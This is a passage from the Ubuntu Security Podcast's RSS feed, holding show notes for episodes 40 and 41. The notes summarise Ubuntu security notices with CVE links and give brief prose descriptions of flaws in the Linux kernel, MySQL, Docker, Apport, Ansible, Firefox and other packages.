<h3 id="usn-4076-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4076-1/">USN-4076-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10142">CVE-2019-10142</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9503">CVE-2019-9503</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2054">CVE-2019-2054</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11884">CVE-2019-11884</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11833">CVE-2019-11833</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20836">CVE-2018-20836</a></li>
</ul>
</li>
<li>Freescale Hypervisor Manager (HVM) for PowerPC - used invalid size
parameter from ioctl() for page size calculations - local attacker could
use this to cause various memory corruption issues possibly resulting in
privilege escalation or code execution (only enabled in Xenial 4.4
kernel)</li>
<li>Broadcom wifi driver would possibly pass through firmware events received
on-the-air to the local USB wifi device - allows a remote attacker to
send firmware events to the device having unspecified impact</li>
<li>Possible seccomp bypass for policies that use ptrace on ARM - a tracing
process could modify a syscall parameter after the seccomp decision for
that syscall had been made - so could violate the policy</li>
<li>Bluetooth HIDP + Ext4 extents information disclosure vulns covered earlier</li>
<li>Race condition in Serial Attached SCSI (SAS) could possibly result in a
UAF -&gt; crash, or code execution</li>
</ul>
<h3 id="lsn-0053-1-linux-kernel-vulnerability">[LSN-0053-1] Linux kernel vulnerability</h3>
<ul>
<li>5 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11884">CVE-2019-11884</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11833">CVE-2019-11833</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11815">CVE-2019-11815</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2054">CVE-2019-2054</a></li>
<li><a href="https://ubuntu.com/security/CVE-2011-1079">CVE-2011-1079</a></li>
</ul>
</li>
<li>RDS UAF, Bluetooth HIDP + Ext4 extents information disclosure vulns covered earlier</li>
<li>Seccomp bypass on ARM</li>
<li>Separate bluetooth info disclosure via ioctl() for a similar non-NUL
terminated string</li>
</ul>
<h3 id="usn-4069-1-usn-4069-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4069-1/">USN-4069-1</a>, <a href="https://usn.ubuntu.com/4069-2/">USN-4069-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Disco and Bionic (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11884">CVE-2019-11884</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11833">CVE-2019-11833</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11599">CVE-2019-11599</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11487">CVE-2019-11487</a></li>
</ul>
</li>
<li>2 information disclosure issues mentioned for the Bionic/Xenial HWE above
(4.15 kernel) - Bluetooth HIDP + Ext4 extents information disclosure
vulns covered earlier</li>
<li>Race condition in coredump generation - local user can trigger coredump
for a process which can race with other memory managment handling and so
could result in access to invalid memory regions - crash -&gt; DoS or
information disclosure</li>
<li>Integer overflow for page reference counts -&gt; UAF
<ul>
<li>Requires at least 140GB of RAM to be affected</li>
</ul>
</li>
</ul>
<h3 id="usn-4070-1-mysql-vulnerabilities">[<a href="https://usn.ubuntu.com/4070-1/">USN-4070-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-2819">CVE-2019-2819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2805">CVE-2019-2805</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2797">CVE-2019-2797</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2791">CVE-2019-2791</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2778">CVE-2019-2778</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2774">CVE-2019-2774</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2758">CVE-2019-2758</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2757">CVE-2019-2757</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2741">CVE-2019-2741</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2740">CVE-2019-2740</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2739">CVE-2019-2739</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2738">CVE-2019-2738</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2737">CVE-2019-2737</a></li>
</ul>
</li>
<li>Latest upstream version 5.7.27 - various vulnerabilities including:
<ul>
<li>Multiple variants of low privileged remote attacker could gain complete
access to all MySQL server data (modify / access etc)</li>
<li>Multiple versions of privileged AND unprivileged attacker could hang /
crash MySQL server</li>
</ul>
</li>
</ul>
<h3 id="usn-4071-1-usn-4071-2-patch-vulnerabilities">[<a href="https://usn.ubuntu.com/4071-1/">USN-4071-1</a>, <a href="https://usn.ubuntu.com/4071-2/">USN-4071-2</a>] Patch vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13638">CVE-2019-13638</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13636">CVE-2019-13636</a></li>
</ul>
</li>
<li>OS shell command injection via a crafted patch file - uses shell meta
characters to take control of patch</li>
<li>Mishandles symlinks which allows a crafted patch file to overwrite
arbitrary files</li>
</ul>
<h3 id="usn-4072-1-ansible-vulnerabilities">[<a href="https://usn.ubuntu.com/4072-1/">USN-4072-1</a>] Ansible vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3828">CVE-2019-3828</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10875">CVE-2018-10875</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10874">CVE-2018-10874</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10156">CVE-2019-10156</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16876">CVE-2018-16876</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16837">CVE-2018-16837</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10855">CVE-2018-10855</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7481">CVE-2017-7481</a></li>
</ul>
</li>
<li>Path traversal vulnerability in fetch module - allows an attacker to
overwrite files outside of the specified destination</li>
<li>Configuration or inventory variables read from CWD - local attacker could
point to an arbitrary module / plugin under their control and so gain
code-execution as the ansible daemon</li>
<li>Various issues with variable substitution which could result in any
variable being substituted and thus an information disclosure</li>
</ul>
<h3 id="usn-4073-1-libebml-vulnerability">[<a href="https://usn.ubuntu.com/4073-1/">USN-4073-1</a>] libEBML vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13615">CVE-2019-13615</a></li>
</ul>
</li>
<li>VLC related issue - lots of media attention - &ldquo;uninstall VLC now&rdquo; etc - overblown</li>
<li>Heap-based buffer over-read in the Matroska decoder - crash -&gt; DoS - not
code-execution</li>
<li>However, VLC itself had a number of outstanding vulnerabilities</li>
</ul>
<h3 id="usn-4074-1-vlc-vulnerabilities">[<a href="https://usn.ubuntu.com/4074-1/">USN-4074-1</a>] VLC vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5439">CVE-2019-5439</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13602">CVE-2019-13602</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12874">CVE-2019-12874</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19857">CVE-2018-19857</a></li>
</ul>
</li>
<li>2 different heap-based buffer overflow - possible RCE but likely mitigated with ASLR (according to upstream)</li>
<li>Double free -&gt; crash -&gt; DoS (glibc heap-protector ensures can&rsquo;t cause heap corruption -&gt; abort)</li>
<li>Invalid pointer dereference (uninitialized) -&gt; crash or infoleak</li>
</ul>
<h3 id="usn-4075-1-exim-vulnerability">[<a href="https://usn.ubuntu.com/4075-1/">USN-4075-1</a>] Exim vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13917">CVE-2019-13917</a></li>
</ul>
</li>
<li>Possible RCE as root if configuration used the ${sort } expansion on
items that can be controlled by an attacker - ie. $domain etc</li>
</ul>
<h3 id="usn-4054-2-firefox-regressions">[<a href="https://usn.ubuntu.com/4054-2/">USN-4054-2</a>] Firefox regressions</h3>
<ul>
<li>21 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11730">CVE-2019-11730</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11729">CVE-2019-11729</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11728">CVE-2019-11728</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11727">CVE-2019-11727</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11725">CVE-2019-11725</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11724">CVE-2019-11724</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11723">CVE-2019-11723</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11721">CVE-2019-11721</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11720">CVE-2019-11720</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11719">CVE-2019-11719</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11718">CVE-2019-11718</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11717">CVE-2019-11717</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11716">CVE-2019-11716</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11715">CVE-2019-11715</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11714">CVE-2019-11714</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11713">CVE-2019-11713</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11712">CVE-2019-11712</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11711">CVE-2019-11711</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11710">CVE-2019-11710</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11709">CVE-2019-11709</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9811">CVE-2019-9811</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-40/">Episode 40</a> - Firefox update for 68.0 contained some minor regressions</li>
<li>Upstream released 68.0.1 to fix these</li>
</ul>
<h3 id="usn-3990-2-urllib3-vulnerability">[<a href="https://usn.ubuntu.com/3990-2/">USN-3990-2</a>] urllib3 vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11236">CVE-2019-11236</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-33/">Episode 33</a> covered for standard support releases</li>
</ul>
<h3 id="usn-4077-1-tmpreaper-vulnerability">[<a href="https://usn.ubuntu.com/4077-1/">USN-4077-1</a>] tmpreaper vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3461">CVE-2019-3461</a></li>
</ul>
</li>
<li>Race condition when performing a bind-mount via rename() - local
privilege escalation since can result in a file being placed elsewhere on
the fs hierarchy - so could drop a file in <em>etc/cron.d</em> for example to
get root code execution</li>
</ul>
<h3 id="usn-4078-1-openldap-vulnerabilities">[<a href="https://usn.ubuntu.com/4078-1/">USN-4078-1</a>] OpenLDAP vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13565">CVE-2019-13565</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13057">CVE-2019-13057</a></li>
</ul>
</li>
<li>Would confuse authorisation for one user with another - so other user
could then perform operations which they were not entitled to - in SASL
authentication code paths</li>
</ul>
<h3 id="usn-4079-1-usn-4079-2-sox-vulnerabilities">[<a href="https://usn.ubuntu.com/4079-1/">USN-4079-1</a>, <a href="https://usn.ubuntu.com/4079-2/">USN-4079-2</a>] SoX vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic and Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8357">CVE-2019-8357</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8356">CVE-2019-8356</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8355">CVE-2019-8355</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8354">CVE-2019-8354</a></li>
</ul>
</li>
<li>CLI audio converter etc - usual sorts of issues for a C based application handling complex input file formats:
<ul>
<li>NULL ptr dereference</li>
<li>Stack-based buffer overflow</li>
<li>2 separate integer overflows -&gt; heap overflow</li>
</ul>
</li>
</ul>
<h3 id="usn-4080-1-openjdk-8-vulnerabilities">[<a href="https://usn.ubuntu.com/4080-1/">USN-4080-1</a>] OpenJDK 8 vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7317">CVE-2019-7317</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2842">CVE-2019-2842</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2816">CVE-2019-2816</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2786">CVE-2019-2786</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2769">CVE-2019-2769</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2762">CVE-2019-2762</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2745">CVE-2019-2745</a></li>
</ul>
</li>
<li>New upstream Java release 8u2222-b10</li>
</ul>
<h3 id="usn-4083-1-openjdk-11-vulnerabilities">[<a href="https://usn.ubuntu.com/4083-1/">USN-4083-1</a>] OpenJDK 11 vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7317">CVE-2019-7317</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2821">CVE-2019-2821</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2818">CVE-2019-2818</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2816">CVE-2019-2816</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2786">CVE-2019-2786</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2769">CVE-2019-2769</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2762">CVE-2019-2762</a></li>
</ul>
</li>
<li>New upstream Java release 11.0.4</li>
</ul>
<h3 id="usn-4081-1-pango-vulnerability">[<a href="https://usn.ubuntu.com/4081-1/">USN-4081-1</a>] Pango vulnerability</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1010238">CVE-2019-1010238</a></li>
</ul>
</li>
<li>Heap-based buffer overflow -&gt; code execution for applications which pass
invalid utf8 to Pango APIs like pango_itemize()</li>
</ul>
<h3 id="usn-4082-1-subversion-vulnerabilities">[<a href="https://usn.ubuntu.com/4082-1/">USN-4082-1</a>] Subversion vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-0203">CVE-2019-0203</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11782">CVE-2018-11782</a></li>
</ul>
</li>
<li>2 remote DoS issues against svnserve</li>
</ul>
<h3 id="usn-4084-1-django-vulnerabilities">[<a href="https://usn.ubuntu.com/4084-1/">USN-4084-1</a>] Django vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14235">CVE-2019-14235</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14234">CVE-2019-14234</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14233">CVE-2019-14233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14232">CVE-2019-14232</a></li>
</ul>
</li>
<li>DoS via memory exhaustion when encoding an attacker controlled URI</li>
<li>SQL injection in key and index lookups in JSON handling</li>
<li>2 different CPU based DoS - 1 in strip_tags() function if input contained
large sequence of nested, incomplete HTML entities, other in truncating
due to use of regex with backtracking</li>
</ul>
<h3 id="usn-4085-1-sigil-vulnerability">[<a href="https://usn.ubuntu.com/4085-1/">USN-4085-1</a>] Sigil vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14452">CVE-2019-14452</a></li>
</ul>
</li>
<li>Zip slip vulnerability discovered by Mike Salvatore (<a href="https://ubuntusecuritypodcast.org/episode-40/">Episode 40</a>)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-the-recent-citrix-password-spraying-attack">Alex and Joe discuss the recent Citrix password spraying attack</h3>
<ul>
<li><a href="https://threatpost.com/citrix-confirms-password-spraying-heist/146641/">https://threatpost.com/citrix-confirms-password-spraying-heist/146641/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E041.mp3" length="25334296" type="audio/mpeg" /><itunes:duration>26:23</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 40
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-40/</link>
          <pubDate>Wed, 24 Jul 2019 09:27:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E040.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 40</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Big roundup of security updates from the past 2 weeks including Docker,
  ZeroMQ, Squid, Redis and more, plus we talk with Joe McManus about some
  recent big fines for companies breaching their GDPR responsibilities and
  it's EOL for...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Big roundup of security updates from the past 2 weeks including Docker,
  ZeroMQ, Squid, Redis and more, plus we talk with Joe McManus about some
  recent big fines for companies breaching their GDPR responsibilities and
  it's EOL for Ubuntu 18.10 Cosmic Cuttlefish.
  </itunes:summary>
        <description>  Big roundup of security updates from the past 2 weeks including Docker,
  ZeroMQ, Squid, Redis and more, plus we talk with Joe McManus about some
  recent big fines for companies breaching their GDPR responsibilities and
  it's EOL for Ubuntu 18.10 Cosmic Cuttlefish.
  </description>
        <googleplay:description>  Big roundup of security updates from the past 2 weeks including Docker,
  ZeroMQ, Squid, Redis and more, plus we talk with Joe McManus about some
  recent big fines for companies breaching their GDPR responsibilities and
  it's EOL for Ubuntu 18.10 Cosmic Cuttlefish.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Big roundup of security updates from the past 2 weeks including Docker,
ZeroMQ, Squid, Redis and more, plus we talk with Joe McManus about some
recent big fines for companies breaching their GDPR responsibilities and
it&rsquo;s EOL for Ubuntu 18.10 Cosmic Cuttlefish.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>62 unique CVEs addressed</p>
<h3 id="usn-4047-1-libvirt-vulnerabilities">[<a href="https://usn.ubuntu.com/4047-1/">USN-4047-1</a>] libvirt vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10168">CVE-2019-10168</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10167">CVE-2019-10167</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10166">CVE-2019-10166</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10161">CVE-2019-10161</a></li>
</ul>
</li>
<li>All related - in each case various libvirt APIs were accessible to users
with read-only permissions and allowed them to perform operations which
they should not have access to - in one case providing an ability to
escalate privileges to root on the host - since would allow to execute
arbitrary binaries with elevated permissions.</li>
<li>By default, libvirt is constrained by AppArmor in Ubuntu which provides
some isolation to help in these cases</li>
</ul>
<h3 id="usn-4048-1-docker-vulnerabilities">[<a href="https://usn.ubuntu.com/4048-1/">USN-4048-1</a>] Docker vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5736">CVE-2019-5736</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15664">CVE-2018-15664</a></li>
</ul>
</li>
<li>Directory traversal via crafted symlink exchange (TOCTOU) via docker cp
command - docker cp can be used to copy files between host and
container - to do this safely, need to resolve paths as though were in
the container - so tries to check a path by resolving symlinks, and then
later use it if validates - but race exists where can then modify a
component in the path via symlink <strong>after</strong> the check but <strong>before</strong> the
copy, so can then overwrite arbitrary files on the host -&gt; privilege
escalation</li>
<li>runc component in docker could allow a container to overwrite the runc
binary on the host -&gt; privilege escalation (and container escape) to the
runc context on the host
<ul>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/runC">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/runC</a></li>
</ul>
</li>
</ul>
<h3 id="usn-4049-1-usn-4049-2-glib-vulnerability">[<a href="https://usn.ubuntu.com/4049-1/">USN-4049-1</a>, <a href="https://usn.ubuntu.com/4049-2/">USN-4049-2</a>] GLib vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13012">CVE-2019-13012</a></li>
</ul>
</li>
<li>Similar to <a href="https://ubuntu.com/security/CVE-2019-12450">CVE-2019-12450</a> (<a href="https://ubuntusecuritypodcast.org/episode-36/">Episode 36</a>) - in this case, directories and
files would get created with default permisssions, not restrictive
permissions, when using the keyfile gsettings backend - could expose
settings or allow other users to modify settings etc.</li>
</ul>
<h3 id="usn-4050-1-zeromq-vulnerability">[<a href="https://usn.ubuntu.com/4050-1/">USN-4050-1</a>] ZeroMQ vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13132">CVE-2019-13132</a></li>
</ul>
</li>
<li>Stack buffer overflow when using CURVE encryption/authentication -&gt; RCE</li>
</ul>
<h3 id="usn-4051-1-usn-4051-2-apport-vulnerability">[<a href="https://usn.ubuntu.com/4051-1/">USN-4051-1</a>, USN-4051-2] Apport vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7307">CVE-2019-7307</a></li>
</ul>
</li>
<li>Reported by Kevin Backhouse of Semmle Security Research Team</li>
<li>TOCTOU when processing a users own ignore configuration file</li>
<li>Apport runs as root, but would check permission to file via access()
system call - which uses the real processes&rsquo; UID / GID - so is safe as a
permission check - BUT would then go and open the file - so in the
meantime this could be replaced by a symlink to say a root owned file
which could then get included in the resulting crash report</li>
<li>Fix is to seteuid() as the desired user to set effective UID to then
actually open the file before restoring euid to root - so this does both
the equivalent of the access and open in 1 call avoiding to TOCTOU</li>
</ul>
<h3 id="usn-4052-1-whoopsie-vulnerability">[<a href="https://usn.ubuntu.com/4052-1/">USN-4052-1</a>] Whoopsie vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11476">CVE-2019-11476</a></li>
</ul>
</li>
<li>Reported by Kevin Backhouse of Semmle Security Research Team</li>
<li>Integer overflow when processing crash dump - when parsing the crash
dump, if it contained an artificially large value in the dump file, would
overflow length calculation, then would result in a heap-buffer OOB write
-&gt; crash, DoS OR code-execution as whoopsie process.</li>
<li>When coupled with previous Apport bug could allow an arbitrary user to
read any file on the system by first embedding it in a crash dump via
Apport and then triggering Whoopsie to process it and expose the via
arbitrary code execution</li>
</ul>
<h3 id="usn-4053-1-gvfs-vulnerabilities">[<a href="https://usn.ubuntu.com/4053-1/">USN-4053-1</a>] GVfs vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12795">CVE-2019-12795</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12449">CVE-2019-12449</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12448">CVE-2019-12448</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12447">CVE-2019-12447</a></li>
</ul>
</li>
<li>gvfs private server socket did not configure any authorisation - so any
user could possible connect to it and issue API calls -&gt; possible code
exection as another user</li>
<li>files created / moved by admin backend could end up with wrong file
ownership - admin backend allows to access root files as normal user (via
admin authorisation) - so can copy files as a user to root&rsquo;s home which
then are still owned by the original user</li>
</ul>
<h3 id="usn-4054-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/4054-1/">USN-4054-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>21 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11730">CVE-2019-11730</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11729">CVE-2019-11729</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11728">CVE-2019-11728</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11727">CVE-2019-11727</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11725">CVE-2019-11725</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11724">CVE-2019-11724</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11723">CVE-2019-11723</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11721">CVE-2019-11721</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11720">CVE-2019-11720</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11719">CVE-2019-11719</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11718">CVE-2019-11718</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11717">CVE-2019-11717</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11716">CVE-2019-11716</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11715">CVE-2019-11715</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11714">CVE-2019-11714</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11713">CVE-2019-11713</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11712">CVE-2019-11712</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11711">CVE-2019-11711</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11710">CVE-2019-11710</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11709">CVE-2019-11709</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9811">CVE-2019-9811</a></li>
</ul>
</li>
<li>Upstream release 68.0</li>
</ul>
<h3 id="usn-4064-1-thunderbird-vulnerabilities">[<a href="https://usn.ubuntu.com/4064-1/">USN-4064-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11730">CVE-2019-11730</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11729">CVE-2019-11729</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11719">CVE-2019-11719</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11717">CVE-2019-11717</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11715">CVE-2019-11715</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11713">CVE-2019-11713</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11712">CVE-2019-11712</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11711">CVE-2019-11711</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11709">CVE-2019-11709</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9811">CVE-2019-9811</a></li>
</ul>
</li>
<li>Upstream release 60.8</li>
</ul>
<h3 id="usn-4055-1-flightcrew-vulnerabilities">[<a href="https://usn.ubuntu.com/4055-1/">USN-4055-1</a>] flightcrew vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Cosmic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13453">CVE-2019-13453</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13241">CVE-2019-13241</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13032">CVE-2019-13032</a></li>
</ul>
</li>
<li>Mike Salvatore discovered and coordinated with upstream on fixing these issues</li>
